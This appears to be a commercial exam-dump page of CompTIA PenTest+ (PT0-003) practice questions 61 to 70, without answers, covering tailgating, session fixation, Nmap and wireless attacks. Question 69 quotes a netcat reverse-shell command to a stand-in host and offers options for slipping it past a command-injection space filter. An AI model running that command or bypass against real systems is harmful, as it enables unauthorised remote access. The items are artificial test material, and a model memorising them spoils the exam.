Summer Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CompTIA PenTest+ Exam

Last Update 10 hours ago Total Questions : 336

The CompTIA PenTest+ Exam content is now fully updated, with all current exam questions added 10 hours ago. Deciding to include PT0-003 practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our PT0-003 exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these PT0-003 sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CompTIA PenTest+ Exam practice test comfortably within the allotted time.

Question # 61

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Question # 62

During a web application assessment, a penetration tester accesses the site unauthenticated and receives the following Set-Cookie on the first response:

auth=yYKGORbrpabgr842ajbvrpbptau42342

When the tester logs in, the server sends only one Set-Cookie header, and the value is exactly the same as shown above. Which of the following vulnerabilities has the tester discovered?

A.

JWT manipulation

B.

Cookie poisoning

C.

Session fixation

D.

Collision attack

Question # 63

A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:

nmap 10.10.1.0/24

Which of the following is the number of TCP ports that will be scanned?

A.

256

B.

1,000

C.

1,024

D.

65,535

Question # 64

A penetration tester is assessing the security of a web application. When the tester attempts to access the application, the tester receives an HTTP 403 response. Which of the following should the penetration tester do to overcome this issue?

A.

Reset file and folder permissions on the web server.

B.

Obtain a valid X.509 certificate.

C.

Spoof the server’s MAC address.

D.

Use a legacy browser to access the page.

Question # 65

Severity: HIGH

Vulnerability: ABC Load Balancer: Alpha OS httpd TLS vulnerability

An Nmap scan of the affected device produces the following results:

Host is up (0.0000040s latency).

Not shown: 98 closed tcp ports (reset)

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

443/tcp closed https

Which of the following best describes this scenario?

A.

True negative

B.

True positive

C.

False negative

D.

False positive

Question # 66

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

A.

Burp Suite

B.

masscan

C.

Nmap

D.

hping

Question # 67

A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices. Which of the following techniques should the penetration tester leverage?

A.

Port mirroring

B.

Sidecar scanning

C.

ARP poisoning

D.

Channel scanning

Question # 68

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

A.

Packet injection

B.

Bluejacking

C.

Beacon flooding

D.

Signal jamming

Question # 69

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

A.

${IFS}

B.

%0a

C.

+ *

D.

%20

Question # 70

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

A.

Risk analysis

B.

Peer review

C.

Root cause analysis

D.

Client acceptance

Go to page: